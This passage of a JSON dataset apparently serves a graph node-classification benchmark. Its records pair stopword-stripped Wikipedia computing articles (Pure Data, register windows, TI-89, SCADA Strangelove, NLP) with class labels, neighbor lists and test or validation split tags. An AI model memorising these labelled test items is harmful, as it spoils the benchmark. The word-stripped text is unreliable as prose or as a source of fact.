accompany pd patches even extending pd gui living pd name data structures enable pd users create arbitrarily complex static well dynamic animated graphical representations musical data much like c structs pd structs composed combination floats symbols array data used parameters describe visual appearance data structure conversely control messages audio signals pd patch puckette words though powerful language pd certain limitations implementation object-oriented concepts example difficult create massively parallel processes instantiating manipulating large lists objects spawning etc impossible due lack constructor function pd arrays entities susceptible namespace collisions passing patch instance id extra step sometimes difficult accomplish pure data used basis number projects prototyping language sound engine table interface called reactable abandoned iphone app rjdj embed pd sound engine pd used prototyping audio video games number audio designers example eapd internal version pd used electronic arts ea also embedded ea spore pd also used networked performance networked resources collaborative improvisation nrci library",
    "neighbors": [
      9345,
      2691,
      7172,
      8958,
      7571,
      6933,
      6810,
      4777,
      5037,
      7983,
      7347,
      692,
      823,
      9783,
      4417,
      3910,
      3665,
      7128,
      9565,
      10083,
      3046,
      9320,
      8554,
      2667,
      5612,
      7535,
      1776,
      8051,
      9210,
      2045,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 7770,
    "label": 3,
    "text": "Register_window:register window computer engineering register windows feature instruction set architectures improve performance procedure calls common operation register windows one main features berkeley risc design would later commercialized amd am29000 intel i960 sun microsystems sparc intel itanium cpu designs include small amount high-speed memory known registers registers used cpu order hold temporary values working longer strings instructions considerable performance added design registers however since registers visible piece cpu instruction set number typically changed design released registers almost universal solution performance drawback different parts computer program use temporary values therefore compete use registers since good understanding nature program flow runtime difficult easy way developer know advance many registers use many leave aside parts program general sorts considerations ignored developers likely compilers use attempt use registers visible case processors registers begin also reasonable course action register windows aim solve issue since every part program wants registers use several sets registers provided different parts program registers visible would registers compete i.e made invisible rendering registers invisible implemented efficiently cpu recognizes movement one part program another procedure call accomplished one small number instructions prologue ends one similarly small set epilogue berkeley design calls would cause new set registers swapped point marked dead reusable call ends berkeley risc design eight registers total 64 visible programs complete set registers known register file particular set eight window file allows eight procedure calls register sets long program call chains longer eight calls deep registers never spilled i.e saved main memory cache slow process compared register access comparison sun microsystems sparc architecture provides simultaneous visibility four sets eight registers three sets eight registers windowed eight registers i0 i7 form input registers current procedure level eight registers l0 l7 local current procedure level eight registers o0 o7 outputs current procedure level next level called procedure called register window shifts sixteen registers hiding old input registers old local registers making old output registers new input registers common registers old output registers new input registers used parameter passing finally eight registers g0 g7 globally visible procedure levels amd 29000 improved design allowing windows variable size helps utilization common case fewer eight registers needed call also separated registers global set 64 additional 128 windows similarly ia-64 itanium architecture used variable-sized windows 32 global registers 96 windows register windows also provide easy upgrade path since additional registers invisible programs additional windows added time instance use object-oriented programming often results greater number smaller calls accommodated increasing windows eight sixteen instance approach used sparc included register windows newer generations architecture end result fewer slow register window spill fill operations register windows overflow less often register windows way improve register performance group stanford university designing mips saw berkeley work decided problem shortage registers poor utilization existing ones instead invested time compiler register allocation making sure wisely used larger set available mips resulted reduced complexity chip one half total number registers offering potentially higher performance cases single procedure could make use larger visible register space end modern compilers mips makes better use register space even procedure calls",
    "neighbors": [
      1798,
      1952,
      10669,
      7471,
      4144,
      9391,
      9911,
      9665,
      9547,
      4172,
      7134,
      8671,
      3175,
      3431,
      5358,
      1776,
      11636,
      757,
      1399,
      3451
    ],
    "mask": "None"
  },
  {
    "node_id": 7771,
    "label": 9,
    "text": "DataFlex:dataflex dataflex formerly known visual dataflex visual tool developing windows web mobile software applications one framework-based platform dataflex produced data access worldwide located miami company founded 1976 called data access corporation product available least 1982 started relatively early example fully fledged commercially used fourth-generation programming language 4gl early forms dataflex available cp/m ms-dos turbodos novell netware os/2 unix vax/vms ibm aix operating systems dataflex lasted many years niche application development environment dataflex product supports many database environments oracle database microsoft sql server ibm db2 mysql postgresql pervasive psql well odbc database dataflex applications used around 3 million users july 2017 version 19.0 dataflex language differentiates programming languages following ways dataflex programming language used following development environments",
    "neighbors": [
      3426,
      8584,
      2345,
      4042,
      8393,
      6797,
      7022,
      847,
      7983,
      9166,
      5875,
      5492,
      10899,
      11030,
      823,
      4409,
      8539
    ],
    "mask": "None"
  },
  {
    "node_id": 7772,
    "label": 3,
    "text": "TI-89_series:ti-89 series ti-89 ti-89 titanium graphing calculators developed texas instruments ti differentiated ti graphing calculators computer algebra system allows symbolic manipulation algebraic expressions—equations solved terms variables whereas ti-83/84 series give numeric result ti-89 graphing calculator developed texas instruments 1998 unit features 160×100 pixel resolution lcd screen large amount flash memory includes ti advanced mathematics software ti-89 one highest model lines ti calculator products along ti-nspire summer 2004 standard ti-89 replaced ti-89 titanium ti-89 runs 16-bit microprocessor motorola 68000 nominally runs 10 12 mhz depending calculator hardware version texas instruments allocated 256 total kb ram unit 190 kb available user 2 mb flash memory 700 kb available user ram flash rom used store expressions variables programs tables text files lists ti-89 essentially ti-92 plus limited keyboard smaller screen created partially response fact calculators allowed many standardized tests ti-92 considered computer due qwerty layout keyboard additionally people found ti-92 unwieldy overly large ti-89 significantly smaller—about size graphing calculators flash rom feature present ti-92 plus original ti-92 major advantage ti-89 lower-model ti calculators built-in computer algebra system cas calculator evaluate simplify algebraic expressions symbolically example entering codice_1 returns formula_1 answer prettyprinted default displayed would written hand e.g aforementioned formula_1 rather codice_1 ti-89 abilities include addition standard two-dimensional function plots also produce graphs parametric equations polar equations sequence plots differential equation fields three-dimensional two independent variable functions ti-89 directly programmable language called ti-basic ti derivative basic calculators use pc also possible develop complex programs motorola 68000 assembly language c translate machine language copy calculator two software development kits c programming available one ti flash studio official ti sdk tigcc third-party sdk based gcc since ti-89 release 1998 thousands programs math science entertainment developed many available games generic clones tetris minesweeper classic games programs advanced example zx spectrum emulator chess-playing program symbolic circuit simulator clone link awakening one popular well-known games phoenix many calculator games useful programs found ti-program sharing sites ticalc.org major one offers thousands calculator programs four hardware versions ti-89 versions normally referred hw1 hw2 hw3 hw4 released may 2006 entering key sequence f1 displays hardware version older os versions 2.00 n't display anything hardware version unless calculator hw2 later differences hardware versions well documented texas instruments hw1 hw2 correspond original ti-89 hw3 hw4 present ti-89 titanium significant difference hw1 hw2 way calculator handles display hw1 calculators video buffer stores information displayed screen every time screen refreshed calculator accesses buffer flushes display direct memory access hw2 later calculators region memory directly aliased display controller memory-mapped i/o allows slightly faster memory access hw1 dma controller used 10 bus bandwidth however interferes trick programs use implement grayscale graphics rapidly switching two displays page-flipping hw1 dma controller base address changed single write memory-mapped hardware register screen automatically use new section memory beginning next frame hw2 new page must written screen software effect cause increased flickering grayscale mode enough make 7-level grayscale supported hw1 unusable although 4-level grayscale works calculators hw2 calculators slightly faster ti increased nominal speed processor 10 mhz 12 mhz believed ti increased speed hw4 calculators 16 mhz though many users disagree finding another difference hw1 hw2 calculators assembly program size limitations size limitation hw2 calculators varied ams version calculator ams 2.09 limit 24k earlier versions limited assembly programs 8k earliest ams versions limit hw1 calculators hardware enforce limits easy bypass software unofficial patches kernels installed hw2 calculators remove limitations ti-89 titanium released summer 2004 largely replaced popular classic ti-89 ti-89 titanium referred hw3 uses corresponding ams 3.x 2006 new calculators upgraded hw4 supposed offer increases ram speeds 16 mhz benchmarks made users reported speeds 12.85–14.1 mhz touted advantages ti-89 titanium original ti-89 include two times flash memory three times much available user ti-89 titanium essentially voyage 200 except n't integrated keyboard ti-89 titanium also usb on-the-go port connectivity ti-89 titanium calculators computer store programs update operating system ti-89 titanium also features pre-loaded applications cellsheet spreadsheet program also offered ti calculators titanium slightly updated cas adds mathematical functions notably implicit differentiation titanium also slightly differing case design ti-89 titanium case design similar ti-84 plus minor compatibility issues c assembly programs developed original ti-89 recompiled work titanium due various small hardware changes though cases problems fixed using utility ghostbuster olivier armand kevin kofler option generally preferred requires knowledge program works without need program source code automated n't require additional computer software cases one character needs changed rom base ti-89 0x200000 whereas ti-89 titanium 0x800000 hand patcher problems caused mirror memory ghost space lack thereof joint council qualifications publish examination instructions behalf main examination boards england wales northern ireland instructions state calculator used examination must designed offer symbolic algebra manipulation symbolic differentiation integration precludes use ti-89 ti-89 titanium examinations may used part classroom study sqa give instructions examinations scotland united states ti-89 allowed college board calculator-permitted tests including sat sat subject tests ap calculus physics chemistry statistics exams however calculator banned use act plan classrooms ti-92 series otherwise comparable features qwerty keyboard results classified computer device rather calculator",
    "neighbors": [
      1952,
      477,
      7269,
      966,
      10855,
      797,
      9964,
      2383,
      7983,
      6129,
      2226,
      9463,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7773,
    "label": 3,
    "text": "The_Duel:_Test_Drive_II:duel test drive ii duel test drive ii racing video game developed distinctive software published accolade amiga amstrad cpc apple iigs commodore 64 ms-dos msx zx spectrum atari st sega genesis snes like original test drive focus duel driving exotic cars dangerous highways evading traffic trying escape police pursuits first game series player simply racing time single scenario test drive ii improves upon predecessor introducing varied scenery giving player option racing clock competing computer-controlled opponent player initially given opportunity choose car drive level difficulty turn determines whether car use automatic manual transmission—the number difficulty options varies gaming platforms levels begin player car computer opponent selected idling roadway primarily two four lane public highways many turns level different include obstacles bridges cliffs tunnels addition cars already road level also one police cars along course goal level reach gas station end course least amount time stopping gas station mandatory one could drive past inattentive consequence stopping results running gas thus losing car life player begins game 5 lives one lost time player crashes something player completes level without crashing running gas awarded bonus life addition losing life crashing adds thirty seconds player time cars could crash traffic off-road obstacles trees could crash falling cliff one mountain levels could sustain much damage staying roadway long flatland levels players could also lose life using manual transmission redlining consequently blowing engine crashing police car instantly ends game regardless number lives player left police cars appear every level player driving faster speed limit encountering one police car follow pursuit point pursued police car able pass player car player forced pull receives ticket stating offense speed vehicle n't cost player life take away valuable time players avoid pursued police slowing encountering anticipating aid radar detector comes standard vehicles game standard version test drive ii player option using one two vehicles three 1992 console versions game vehicles presented beginning game technical specifications including top speed torque acceleration rates cars included porsche 959 ferrari f40 third car lamborghini diablo non-console versions accolade later released two data disks included playable cars released many platforms computer versions game provided one course referred game “ master scenery ” consisting several stages stage one three possible locations desert cacti along side road mountain sheer rock wall one side highway cliff occasionally tunnel mountain grassy area trees later two scenery disks released containing additional course four available courses snes version game varying length difficulty route public highway different part continental united states courses included three cars chosen version game technically stopped law point animated female police officer smiles character character smiles return apprehended law enforcement various infractions including evasion police course end sequence shows female police officer placing player arrest virtually impossible complete given course without police confrontation end game due fact must maintain high speeds evade police cars highways computer gaming world stated liked test drive would like version like predecessor steering system avoid compute favorably reviewed game realism especially joystick stated installation overly difficult frustrating",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7774,
    "label": 2,
    "text": "QP_(framework):qp framework qp quantum platform family lightweight open source software frameworks building responsive modular real-time embedded applications systems cooperating event-driven active objects actors qp family consists qp/c qp/c++ qp-nano frameworks quality controlled documented commercially licensable qp frameworks run bare-metal single-chip microcontrollers completely replacing traditional real-time operating system rtos ports ready-to-use examples provided major cpu families qp/c qp/c++ also work traditional os/rtos posix linux qnx windows vxworks threadx microc/os freertos etc behavior active objects actors specified qp means hierarchical state machines uml statecharts frameworks support manual coding uml state machines c c++ well fully automatic code generation means free graphical qm modeling tool qp frameworks qm modeling tool used medical devices defense aerospace robotics consumer electronics wired wireless telecommunication industrial automation transportation many active objects inherently support automatically enforce following best practices concurrent programming active objects dramatically improve ability reason concurrent software contrast using raw rtos tasks directly trouble number reasons particularly raw tasks let anything offer help automation best practices good patterns active objects raise level abstraction naked threads let express intent directly thus improving productivity active objects operate vacuum require software infrastructure framework provides minimum execution thread active object queuing events event-based timing services resource-constrained embedded systems biggest concern always scalability efficiency frameworks especially frameworks accompanying various modeling tools traditionally built top conventional rtos adds memory footprint cpu overhead final solution qp frameworks designed efficiency minimal footprint ground need rtos stand-alone configuration fact compared conventional rtoses qp frameworks provide smaller footprint especially ram data space also rom code space possible active objects n't need block blocking mechanisms e.g. semaphores conventional rtos needed characteristics make event-driven active objects perfect fit single-chip microcontrollers mcus get productivity boost working higher level abstraction raw rtos tasks get lower resource utilization better power efficiency event-driven systems use cpu processing events otherwise put chip low-power sleep mode qp consists universal uml-compliant event processor qep portable event-driven real-time framework qf tiny run-to-completion kernel qk software tracing system qs qep quantum event processor universal uml-compliant event processor enables direct coding uml state machines uml statecharts highly maintainable c c++ every state machine element mapped code precisely unambiguously exactly traceability qep fully supports hierarchical state nesting enables reusing behavior across many states instead repeating actions transitions qf quantum framework highly portable event-driven real-time application framework concurrent execution state machines specifically designed real-time embedded systems qk quantum kernel tiny preemptive non-blocking run-to-completion kernel designed specifically executing state machines run-to-completion rtc fashion qs quantum spy software tracing system enables live monitoring event-driven qp applications minimal target system resources without stopping significantly slowing code types qp frameworks qp/c qp/c++ qp-nano easily adapted various microprocessor architectures compilers adapting qp software called porting qp frameworks designed ground make porting easy currently bare-metal qp ports exist following processor architectures qp/c qp/c++ frameworks also work traditional operating systems rtoses currently qp ports exist following oses/rtoses qp framework types dual-licensed open source gplv2 traditional closed-source license users want distribute qp e.g embedded inside user upgradable devices retain proprietary status code fee several types commercial royalty-free closed-source licenses available",
    "neighbors": [
      7235,
      4773,
      8262,
      682,
      9964,
      6797,
      2383,
      7983,
      2517,
      7445,
      823,
      9366,
      2045,
      6207
    ],
    "mask": "Test"
  },
  {
    "node_id": 7775,
    "label": 9,
    "text": "Niklaus_Wirth:niklaus wirth niklaus emil wirth born 15 february 1934 swiss computer scientist designed several programming languages including pascal pioneered several classic topics software engineering 1984 turing award generally recognized highest distinction computer science developing sequence innovative computer languages wirth born winterthur switzerland 1934 1959 earned degree electronics engineering swiss federal institute technology zürich eth zürich 1960 earned m.sc université laval canada 1963 awarded ph.d. electrical engineering computer science eecs university california berkeley supervised computer designer pioneer harry huskey 1963 1967 served assistant professor computer science stanford university university zurich 1968 became professor informatics eth zürich taking two one-year sabbaticals xerox parc california 1976–1977 1984–1985 wirth retired 1999 2004 made fellow computer history museum seminal work programming languages algorithms including euler algol-w pascal modula oberon wirth chief designer programming languages euler algol w pascal modula modula-2 oberon oberon-2 oberon-07 also major part design implementation team lilith oberon operating systems lola digital hardware design simulation system received association computing machinery acm turing award development languages 1984 1994 inducted fellow acm book written jointly kathleen jensen pascal user manual report served basis many language implementation efforts 1970s 1980s united states across europe article program development stepwise refinement teaching programming considered classic text software engineering 1975 wrote book algorithms data structures programs gained wide recognition major revisions book new title algorithms data structures published 1985 2004 examples first edition written pascal replaced later editions examples written modula-2 oberon respectively textbook systematic programming introduction considered good source students wanted coding regarded challenging text work sought imperative reading interested numerical mathematics 1992 published together jürg gutknecht full documentation oberon os.. second book together martin reiser intended programmer guide 1995 popularized adage known wirth law states software getting slower rapidly hardware becomes faster 1995 paper plea lean software attributes martin reiser",
    "neighbors": [
      512,
      9345,
      2179,
      4483,
      4998,
      9351,
      7048,
      9224,
      4107,
      11020,
      8973,
      6414,
      6160,
      6801,
      8082,
      9107,
      11411,
      8219,
      6558,
      7071,
      1952,
      1956,
      7076,
      8868,
      10617,
      10668,
      5677,
      7983,
      2482,
      6454,
      7479,
      1976,
      9019,
      4412,
      6652,
      4799,
      4800,
      10049,
      4930,
      6979,
      11457,
      70,
      8262,
      3529,
      1610,
      1611,
      8524,
      10061,
      11339,
      213,
      726,
      2519,
      1883,
      2012,
      11099,
      4578,
      6242,
      9315,
      10471,
      4201,
      11242,
      2283,
      2798,
      9710,
      3184,
      4341,
      7158,
      1783,
      8057,
      8059,
      3196,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 7776,
    "label": 2,
    "text": "Address_Windowing_Extensions:address windowing extensions address windowing extensions awe microsoft windows application programming interface allows 32-bit software application access physical memory virtual address space even excess 4 gb limit process mapping application virtual address space physical memory awe known windowing similar overlay concept environments awe beneficial certain data-intensive applications database management systems scientific engineering software need manipulate large data sets minimizing paging application reserves region window virtual address space allocates one regions physical memory using awe api application map virtual window one physical regions application reserve one virtual address space map allocated regions physical memory long number bytes reserved virtual address space matches physical memory region application must lock pages memory privilege use awe 32-bit systems awe depends physical address extension support reserving memory 4 gb awe first introduced windows 2000 new api superseding pse36 method windows nt 4.0 enterprise edition accessing 4 gb memory longer supported windows 2000 among first applications make use awe oracle 8.1.6 microsoft sql server 2000 /3gb boot flag used repartition 32-bit virtual address space 2 gb kernel 2 gb userland 3 gb userland awe limited accessing 16 gb physical memory limitation one gb reserved kernel n't enough memory page table entries map 16 gb memory additional restrictions maximum amount memory addressable thorough awe imposed windows licensing scheme example windows 2000 advanced server limited 8 gb windows 2000 data center server supported 64 gb article published dr. dobb journal 2004 noted memory allocated using address windowing extensions written pagefile suggested awe regions could therefore used way protecting sensitive application data encryption keys",
    "neighbors": [
      10340,
      6797,
      5840,
      8080,
      3250,
      2901,
      11030,
      7032
    ],
    "mask": "Test"
  },
  {
    "node_id": 7777,
    "label": 9,
    "text": "Xtext:xtext xtext open-source software framework developing programming languages domain-specific languages dsls unlike standard parser generators xtext generates parser also class model abstract syntax tree well providing fully featured customizable eclipse-based ide xtext developed eclipse project part eclipse modeling framework project licensed eclipse public license first version xtext published 2006 openarchitectureware project last version released oaw project version 4.3 since beginning 2008 xtext developed eclipse eclipse modeling project joining eclipse annual simultaneous release xtext released version 0.7.0 june 2009 1.0 june 2010 2.0 june 2011 2.3 june 2012 2.5 december 2013 2.6 may 2014 2.7 september 2014 framework mainly developed german company itemis specify language developer write grammar xtext grammar language grammar describes ecore model derived textual notation definition code generator derives antlr parser classes object model used independently eclipse xtext includes features integrate well eclipse-based ide xtext languages ide highly configurable language infrastructure ide wired using dependency injection guice default components easily replaced binding customized ones instead since version 2.0 xtext facilitated development domain-specific languages java virtual machine referring compiling java artifacts tight integration eclipse java development toolkit reusable expression languages library enables rich behavior within dsl code generator written xtend hooked language jvm languages enough map dsl concepts java artifacts get holistic java integration alternative interpreter also available time writing article xtext homepage listed around 40 commercial non-commercial projects several application domains using xtext general-purpose language xtend also built xtext",
    "neighbors": [
      9926,
      2537,
      16,
      1552,
      5872,
      6581,
      3545,
      3710
    ],
    "mask": "Test"
  },
  {
    "node_id": 7778,
    "label": 4,
    "text": "SCADA_Strangelove:scada strangelove scada strangelove independent group information security researchers founded 2012 focused security assessment industrial control systems ics scada main fields research include scada strangelove interests expand classic ics components covers various embedded systems however encompass smart home components solar panels wind turbines smartgrid well areas group members continue develop publish numerous open source tools scanning fingerprinting security evaluation password bruteforcing ics devices devices work industrial protocols modbus siemens s7 mms iso ec 60870 profinet 2014 shodan used published tools building map ics devices publicly available internet open source security assessment frameworks thc hydra metasploit digitalbond redpoint used shodan-developed tools techniques group published security-hardening guidelines industrial solutions based siemens simatic wincc wincc flexible guidelines contain detailed security configuration walk-throughs descriptions internal security features appropriate best practices among group ’ noticeable projects choo choo pwn ccp also named critical infrastructure attack cia interactive laboratory built upon ics software hardware used real world every system connected toy city infrastructure includes factories railroads facilities laboratory demonstrated various conferences including phdays power community 30c3 primarily laboratory used discovery new vulnerabilities evaluation security mechanisms however also used workshops educational activities positive hack days iv contestants found several 0-day vulnerabilities indusoft web studio 7.1 schneider electric specific ics hardware rtu pet-7000 ics vulnerability discovery challenge group supports secure open smartgrid scadasos project find fix vulnerabilities intellectual power grid components photovoltaic power station wind turbine power inverter 80 000 industrial devices discovered isolated internet 2015 group members frequently seen presenting conferences like ccc scada security scientific symposium positive hack days notable talks overview vulnerabilities discovered widely distributed siemens simatic wincc software tools implemented searching ics internet talk consisted overview vulnerabilities discovered various systems produced abb emerson honeywell siemens presented phdays iii phdays iv implications security research aimed realization various industrial network protocols profinet modbus dnp3 iec 61850-8-1 mms iec international electrotechnical commission 61870-5-101/104 fte fault tolerant ethernet siemens s7 presentations security research showing impact radio 3g/4g networks security mobile devices well industrial equipment analysis security architecture implementation wide spread platforms wind solar energy generation produce many gigawatts cybersecurity assessment railway signaling systems automatic train control atc computer-based interlocking cbi european train control system etcs greater china cyber threat landscape keynote sergey gordeychik overview vulnerabilities attacks cyber-security incidents greater china region presented talk hopeless relay protection substation automation kirill nesterov alexander tlyapov security analysis results key digital substation component relay protection terminals presented vulnerabilities including remote code execution siemens siprotec general electric line distance relay nari abb protective relays presented names catchwords graphical elements refer stanley kubrick ’ film dr. strangelove talks group members often refer cold war events caribbean crisis draw parallels nuclear arms race current escalation cyberwar group members follow approach “ responsible disclosure ” “ ready wait years vendor patching vulnerability ” public exploits discovered vulnerabilities published account longevity ics implication long process patching ics however conflicts still happen notably 2012 talk def con called due dispute persistent weaknesses siemens industrial software",
    "neighbors": [
      5373,
      4445
    ],
    "mask": "Test"
  },
  {
    "node_id": 7779,
    "label": 8,
    "text": "Easyrec:easyrec easyrec open-source program provides personalized recommendations using restful web services integrated web enabled applications distributed gnu general public license studio smart agent technologies hosted sourceforge written java uses mysql database comes administration tool development easyrec implementation adaptive personalization approach started course several research development projects conducted studio smart agent technologies close cooperation international companies year 2008 core functionality easyrec developed forming basis research prototypes focusing music domain e.g musicexplorer june 2009 beta version easyrec containing basic administration features integrated movie streaming portal evaluation purposes furthermore september 2009 easyrec awarded special recognition category “ award innovations – innovations economic upswing ” jury austrian state prize multimedia e-business comprehensive refactoring phase integration evaluation results easyrec published sourceforge 18 february 2010 course cebit tradeshow 2011 hanover easyrec awarded german “ innovationspreis-it 2011 ” following five primary goals guided development easyrec although easyrec domain-agnostic general purpose personalization system current web service api customized providing online shops item recommendations especially small medium enterprises easyrec provides low barrier entrance personalization major feature easyrec set usage statistics business relevant information presented via administration management interface furthermore easyrec administrator supported variety administration configuration functions including manual import adaptation business rules integrators developers benefit lightweight web service apis rest soap well guided installation wizard concerning personalization functionality easyrec providing following services additionally integration showcase mediawiki extension developed bundled application currently additional features like recommender algorithms plugin-system evaluated prepared integration easyrec system underlying architecture easyrec designed robust scalable—separating time-consuming computations task online assembling recommendations easyrec designed multi-layer system consisting moreover generator server contains different item association generators create business rules define relation two items examples web sites using easyrec recommender system",
    "neighbors": [
      10020,
      5677,
      7022
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7780,
    "label": 0,
    "text": "Natural_language_processing:natural language processing natural language processing nlp subfield linguistics computer science information engineering artificial intelligence concerned interactions computers human natural languages particular program computers process analyze large amounts natural language data challenges natural language processing frequently involve speech recognition natural language understanding natural language generation history natural language processing nlp generally started 1950s although work found earlier periods 1950 alan turing published article titled computing machinery intelligence proposed called turing test criterion intelligence georgetown experiment 1954 involved fully automatic translation sixty russian sentences english authors claimed within three five years machine translation would solved problem however real progress much slower alpac report 1966 found ten-year-long research failed fulfill expectations funding machine translation dramatically reduced little research machine translation conducted late 1980s first statistical machine translation systems developed notably successful natural language processing systems developed 1960s shrdlu natural language system working restricted blocks worlds restricted vocabularies eliza simulation rogerian psychotherapist written joseph weizenbaum 1964 1966 using almost information human thought emotion eliza sometimes provided startlingly human-like interaction patient exceeded small knowledge base eliza might provide generic response example responding head hurts say head hurts 1970s many programmers began write conceptual ontologies structured real-world information computer-understandable data examples margie schank 1975 sam cullingford 1978 pam wilensky 1978 talespin meehan 1976 qualm lehnert 1977 politics carbonell 1979 plot units lehnert 1981 time many chatterbots written including parry racter jabberwacky 1980s natural language processing systems based complex sets hand-written rules starting late 1980s however revolution natural language processing introduction machine learning algorithms language processing due steady increase computational power see moore law gradual lessening dominance chomskyan theories linguistics e.g transformational grammar whose theoretical underpinnings discouraged sort corpus linguistics underlies machine-learning approach language processing earliest-used machine learning algorithms decision trees produced systems hard if-then rules similar existing hand-written rules however part-of-speech tagging introduced use hidden markov models natural language processing increasingly research focused statistical models make soft probabilistic decisions based attaching real-valued weights features making input data cache language models upon many speech recognition systems rely examples statistical models models generally robust given unfamiliar input especially input contains errors common real-world data produce reliable results integrated larger system comprising multiple subtasks many notable early successes occurred field machine translation due especially work ibm research successively complicated statistical models developed systems able take advantage existing multilingual textual corpora produced parliament canada european union result laws calling translation governmental proceedings official languages corresponding systems government however systems depended corpora specifically developed tasks implemented systems often continues major limitation success systems result great deal research gone methods effectively learning limited amounts data recent research increasingly focused unsupervised semi-supervised learning algorithms algorithms able learn data hand-annotated desired answers using combination annotated non-annotated data generally task much difficult supervised learning typically produces less accurate results given amount input data however enormous amount non-annotated data available including among things entire content world wide web often make inferior results algorithm used low enough time complexity practical 2010s representation learning deep neural network-style machine learning methods became widespread natural language processing due part flurry results showing techniques achieve state-of-the-art results many natural language tasks example language modeling parsing many others popular techniques include use word embeddings capture semantic properties words increase end-to-end learning higher-level task e.g. question answering instead relying pipeline separate intermediate tasks e.g. part-of-speech tagging dependency parsing areas shift entailed substantial changes nlp systems designed deep neural network-based approaches may viewed new paradigm distinct statistical natural language processing instance term neural machine translation nmt emphasizes fact deep learning-based approaches machine translation directly learn sequence-to-sequence transformations obviating need intermediate steps word alignment language modeling used statistical machine translation smt early days many language-processing systems designed hand-coding set rules e.g writing grammars devising heuristic rules stemming however rarely robust natural language variation since so-called statistical revolution late 1980s mid 1990s much natural language processing research relied heavily machine learning machine-learning paradigm calls instead using statistical inference automatically learn rules analysis large corpora typical real-world examples corpus plural corpora set documents possibly human computer annotations many different classes machine-learning algorithms applied natural-language-processing tasks algorithms take input large set features generated input data earliest-used algorithms decision trees produced systems hard if-then rules similar systems hand-written rules common increasingly however research focused statistical models make soft probabilistic decisions based attaching real-valued weights input feature models advantage express relative certainty many different possible answers rather one producing reliable results model included component larger system systems based machine-learning algorithms many advantages hand-produced rules following list commonly researched tasks natural language processing tasks direct real-world applications others commonly serve subtasks used aid solving larger tasks though natural language processing tasks closely intertwined frequently subdivided categories convenience coarse division given first published work artificial intelligence published 2018 1 road marketed novel contains sixty million words",
    "neighbors": [
      8705,
      5122,
      2059,
      4624,
      1044,
      538,
      4635,
      3617,
      4131,
      5667,
      2602,
      10794,
      7724,
      8748,
      11308,
      1072,
      4662,
      2103,
      3127,
      8759,
      11318,
      3646,
      6208,
      8257,
      1098,
      5197,
      6223,
      10320,
      5203,
      6745,
      5218,
      8291,
      9830,
      1129,
      8297,
      3698,
      119,
      5248,
      9345,
      6274,
      8323,
      133,
      3721,
      8843,
      6798,
      5781,
      10909,
      6304,
      3748,
      5288,
      2223,
      4271,
      6841,
      3261,
      9918,
      6341,
      9926,
      2247,
      1737,
      9932,
      717,
      9935,
      7892,
      2263,
      11479,
      731,
      3808,
      2273,
      4322,
      5857,
      9956,
      8421,
      6374,
      4327,
      7910,
      7918,
      1269,
      2294,
      5880,
      8440,
      3323,
      5373,
      4350,
      4354,
      261,
      6406,
      1289,
      11538,
      5399,
      2336,
      3874,
      11043,
      4388,
      7462,
      9515,
      10541,
      7983,
      11056,
      9522,
      3891,
      3389,
      10557,
      9552,
      10577,
      2901,
      8538,
      9569,
      1890,
      867,
      874,
      8554,
      8046,
      882,
      4468,
      4469,
      4980,
      4995,
      2440,
      8080,
      7577,
      4509,
      3998,
      7069,
      416,
      7585,
      8099,
      6052,
      2469,
      7599,
      10160,
      4531,
      2999,
      2488,
      8122,
      4038,
      11206,
      456,
      1480,
      3529,
      6088,
      3533,
      1490,
      2522,
      4072,
      5611,
      9710,
      8688,
      9714,
      3059,
      10231,
      7164,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7781,
    "label": 4,
    "text": "Data_anonymization:data anonymization data anonymization type information sanitization whose intent privacy protection process either encrypting removing personally identifiable information data sets people data describe remain anonymous european union new general data protection regulation demands stored data people eu undergo either anonymization pseudonymization process data anonymization defined process personal data irreversibly altered way data subject longer identified directly indirectly either data controller alone collaboration party data anonymization enables transfer information across boundary two departments within agency two agencies reducing risk unintended disclosure certain environments manner enables evaluation analytics post-anonymization context medical data anonymized data refers data patient identified recipient information name address full post code must removed together information conjunction data held disclosed recipient could identify patient.. de-anonymization reverse process anonymous data cross-referenced data sources re-identify anonymous data source generalization perturbation two popular anonymization approaches relational data.. process obscuring data ability re-identify later also called pseudonymization one way companies store data way hipaa compliant ordered alphabetically",
    "neighbors": [
      4232,
      9036,
      3629,
      9901,
      11695,
      10134,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 7782,
    "label": 3,
    "text": "Howard_the_Duck_(video_game):howard duck video game howard duck also known howard duck adventure volcano island action video game released 1986 activision zx spectrum commodore 64 apple ii game tie-in film howard duck came year game involves players controlling howard duck save best friends phil beverly parachuted volcano island howard needs find backpack proceed search game consists four levels last howard armed neutron gun finally face overlord game received fairly negative reviews computer gamer gave overall 55 stating beautifully presented well programmed rates one activision better recent releases deserves consideration outside unfortunate tie-in predicting however low longevity aktueller software markt described game fulfilling expectancies worth money",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 7783,
    "label": 3,
    "text": "Bit_Manipulation_Instruction_Sets:bit manipulation instruction sets bit manipulation instructions sets bmi sets extensions x86 instruction set architecture microprocessors intel amd purpose instruction sets improve speed bit manipulation instructions sets non-simd operate general-purpose registers two sets published intel bmi referred bmi1 bmi2 introduced haswell microarchitecture another two sets published amd abm advanced bit manipulation also subset sse4a implemented intel part sse4.2 bmi1 tbm trailing bit manipulation extension introduced piledriver-based processors extension bmi1 dropped zen-based processors abm implemented single instruction set amd amd processors support instructions neither intel considers codice_1 part sse4.2 codice_2 part bmi1 codice_1 separate cpuid flag however intel uses amd codice_4 flag indicate codice_2 support since codice_2 completes abm codice_2 almost identical bit scan reverse codice_8 instruction sets zf result zero cf source zero flags rather produces defined result source operand size bits source operand zero instructions enabled codice_9 bit cpuid intel officially considers codice_2 part bmi advertises codice_2 support using codice_4 cpuid feature flag bmi1 available amd jaguar piledriver newer processors intel haswell newer processors intel introduced bmi2 together bmi1 line haswell processors amd produced processors supporting bmi1 without bmi2 bmi2 supported amds excavator architecture newer codice_13 codice_14 instructions new generalized bit-level compress expand instructions take two inputs one source selector selector bitmap selecting bits packed unpacked codice_14 copies selected bits source contiguous low-order bits destination higher-order destination bits cleared codice_13 opposite selected bits contiguous low-order bits copied selected bits destination destination bits cleared used extract bitfield input even lot bit-level shuffling previously would expensive instructions similar bit level gather-scatter simd instructions codice_13 codice_14 instructions like rest bmi instruction sets operate general-purpose registers 